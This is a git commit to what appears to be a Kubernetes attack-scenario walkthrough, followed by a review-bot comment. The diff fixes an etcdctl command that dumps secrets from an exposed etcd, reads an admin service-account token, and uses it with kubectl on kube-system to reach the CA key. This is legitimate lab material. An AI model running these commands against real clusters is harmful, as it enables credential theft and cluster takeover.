fix broken command
/registry/secrets/kube-system/admins-account-token-RAND doesn't exist, but a very similarly worded account token does:
/registry/secrets/default/admins-account-token-RAND
Upon testing, this account token (even though it's associated with the default namespace) gives you access to the kube-system namespace and is sufficient for obtaining ca.key.
I've replaced the broken command with a working one to avoid future confusion.
mrintern authored Aug 18, 2022
1 parent 3108734 commit 8c424f5
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion Scenario Walkthroughs/etcd.md
Expand Up @@ -5,7 +5,7 @@
3. First we need to dump some secrets out of the etcd database
`etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[CLUSTERIP]:2379 get / --prefix --keys-only | grep token`
4. Then we'll need a service account token to authenticate to the cluster with. Looking through the list of accounts we can see an admins-account
`etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[IP]:2379 get /registry/secrets/kube-system/admins-account-token-[RAND]`
`etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[IP]:2379 get /registry/secrets/default/admins-account-token-[RAND]`
The service account token starts with ey and ends just before the word `kubernetes.io` in the token.
5. With the service token we can use kubectl , first get the API pod name
`kubectl --insecure-skip-tls-verify -shttps://[IP]:6443/ --token="[TOKEN]" -n kube-system get po`
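Review bot: The changed line in step 4 now reads the secret from `/registry/secrets/default/`, but the step text still names no namespace and step 5 goes straight to `-n kube-system`, so a reader cannot tell why a token stored under `default` is expected to work there. Add a sentence to step 4 stating that the admins-account token lives in the default namespace and, as the commit message reports from testing, still gives access to kube-system. While touching these lines, note that the endpoint placeholder is `[CLUSTERIP]` in step 3 but `[IP]` in steps 4 and 5; use one form throughout.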